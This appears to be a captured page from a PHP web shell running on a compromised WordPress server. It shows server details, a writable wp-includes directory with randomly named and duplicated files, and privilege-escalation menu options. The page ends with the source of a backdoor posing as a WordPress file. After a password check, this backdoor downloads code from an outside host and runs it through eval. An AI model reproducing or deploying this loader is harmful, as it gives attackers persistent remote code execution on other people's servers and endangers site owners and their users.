Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 216.73.216.138
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
certificates /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
aOtxjgNG-20250514033210.php
2.46
KB
-rwxrwxrwx
2025-05-09 05:54
autosave.min.js
5.67
KB
-rwxrwxrwx
2023-02-02 16:36
block-bindings.php
5.46
KB
-rwxrwxrwx
2024-07-16 17:55
block-directory-20250514003935.js
78.64
KB
-rwxrwxrwx
2025-04-15 17:44
cache-compat-20250514093141.php
5.83
KB
-rwxrwxrwx
2022-10-10 18:22
cache-compat.php
5.83
KB
-rwxrwxrwx
2022-10-10 18:22
class-oembed.php
401
B
-rwxrwxrwx
2022-06-17 11:20
class-simplepie.php
453
B
-rwxrwxrwx
2024-11-13 12:36
class-wp-locale.php
16.49
KB
-rwxrwxrwx
2025-04-15 17:44
class-wp-network.php
12.01
KB
-rwxrwxrwx
2024-11-13 12:36
class-wp-phpmailer.php
3.71
KB
-rwxrwxrwx
2025-04-15 17:44
class-wp-rewrite.php
62.2
KB
-rwxrwxrwx
2024-11-13 12:36
class-wp-taxonomy.php
18.12
KB
-rwxrwxrwx
2025-04-15 17:44
class-wp.php
25.7
KB
-rwxrwxrwx
2025-04-15 17:44
customize-views-20250513213247.js
4.95
KB
-rwxrwxrwx
2018-06-28 02:30
customize-views.min-20250513214459.js
2.39
KB
-rwxrwxrwx
2021-01-06 15:29
customize-views.min-20250514060333.js
2.39
KB
-rwxrwxrwx
2021-01-06 15:29
duotone.php
2.67
KB
-rwxrwxrwx
2024-07-16 17:55
edit-site-20250514004515.js
1.56
MB
-rwxrwxrwx
2025-04-15 17:44
edit-site.min.js
626.11
KB
-rwxrwxrwx
2025-04-15 17:44
edit-widgets.min-20250514002642.js
57.23
KB
-rwxrwxrwx
2025-04-15 17:44
feed-rss.php
1.16
KB
-rwxrwxrwx
2020-01-29 00:45
handlers.min.js
1.25
KB
-rwxrwxrwx
2017-09-21 16:35
http.php
24.72
KB
-rwxrwxrwx
2025-05-09 07:39
https-migration-20250514045752.php
4.63
KB
-rwxrwxrwx
2023-07-10 22:38
jquery.Jcrop.min.js
22.06
KB
-rwxrwxrwx
2022-03-24 20:07
media-grid.min.js
12.95
KB
-rwxrwxrwx
2025-04-15 17:44
ms-files-20250514092528.php
2.68
KB
-rwxrwxrwx
2025-04-30 17:44
ms-network.php
3.69
KB
-rwxrwxrwx
2023-05-02 11:26
nux-20250514002854.js
12.98
KB
-rwxrwxrwx
2025-04-15 17:44
pluggable-deprecated.php
6.18
KB
-rwxrwxrwx
2025-04-15 17:44
plugin.php
34.74
KB
-rwxrwxrwx
2024-07-16 17:55
private-apis-20250514002209.js
8.3
KB
-rwxrwxrwx
2025-04-15 17:44
rss.php
22.57
KB
-rwxrwxrwx
2024-11-13 12:36
sUUyBfCpZ.php
166.01
KB
-rwxrwxrwx
2025-05-09 05:54
spl-autoload-compat.php
441
B
-rwxrwxrwx
2020-11-12 11:17
wordcount.min.js
2.42
KB
-rwxrwxrwx
2024-04-03 05:49
wp-api.min-20250513212756.js
14.34
KB
-rwxrwxrwx
2023-02-02 16:36
wp-mediaelement-20250514002653.js
2.69
KB
-rwxrwxrwx
2023-02-07 16:00
wp-util.min-20250513213609.js
1.39
KB
-rwxrwxrwx
2022-09-20 03:52
Save
Rename
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '0e3fbd5d9cca9d838d21ded8de713482'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; // Replace this with your cookie data } else { // Password is incorrect echo "Incorrect password. Please try again."; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://vpsdd.fnftus.top/test/gg.txt'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html> <head> <title>Login Admin</title> </head> <body> <form method="POST" action=""> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>